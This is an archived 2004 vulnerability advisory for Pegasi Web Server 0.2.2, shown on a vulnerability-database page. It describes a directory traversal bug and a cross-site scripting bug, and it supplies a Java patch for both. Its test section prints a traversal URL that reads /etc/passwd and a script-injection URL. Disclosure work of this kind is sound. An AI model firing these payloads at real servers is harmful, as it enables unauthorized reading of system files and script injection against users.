Vulners
Lucene search
Pegasi022.txt
🗓️ 12 Mar 2004 00:00:00Reported by Donato FerranteType 
packetstorm🔗 packetstormsecurity.com👁 14 Views
` Donato Ferrante
Application: Pegasi Web Server (PWS)
http://pws.sourceforge.net
Version: 0.2.2
Bugs: Multiple Vulnerabilities
Author: Donato Ferrante
e-mail: [email protected]
web: www.autistici.org/fdonato
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
1. Description
2. The bugs
3. The code
4. The fix
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
----------------
1. Description:
----------------
Vendor's Description:
"Pegasi Web Server (PWS) is a multithreading Java Web server. It is
written by students at the PegasiLUG as a project for Networking."
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
-------------
2. The bugs:
-------------
[1] directory traversal bug: the program doesn't check for malicious
patterns like "/../", so an attacker is able to navigate through
the system simply using a browser.
[2] cross site scripting bug: the user input strings are not filtered
and they will appear in the returned page.
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
-------------
3. The code:
-------------
To test the vulnerabilities:
[1]
http://[host]:8080/../../../../etc/passwd
or:
http://[host]:8080/../
[2]
http://[host]:8080/<script>alert("Test")</script>
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
------------
4. The fix:
------------
No fix.
The email addresses provided on the official website seem don't work.
If you want, you can use my following little patch, that should fix
the bugs for this version of Pegasi Web Server:
...
..
.
( line: 30 of FileFinder.java ) FileFinder(String httpURIPath)
{
/* start of patch for [1] */
boolean done = false;
for(int z = 0; z < httpURIPath.length()-1; z++){
if( httpURIPath.charAt(z) == '.' && httpURIPath.charAt(z+1) == '.'){
this.status = -1;
done = true;
}
}
if( done == true ) return;
/* end of patch for [1] */
.
..
...
- - - - -
...
..
.
( line: 233 of Connection.java )
/* start of patch for [2] */
case -1: /* nothing found */
{
Misc.putSysMessage(0,"Requested file was NOT found.");
output.outputError(404, " ");
//before "output.outputError(404,httpURI);"
break;
}
/* end of patch for [2] */
.
..
...
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
12 Mar 2004 00:00Current
7.4High risk
Vulners AI Score7.4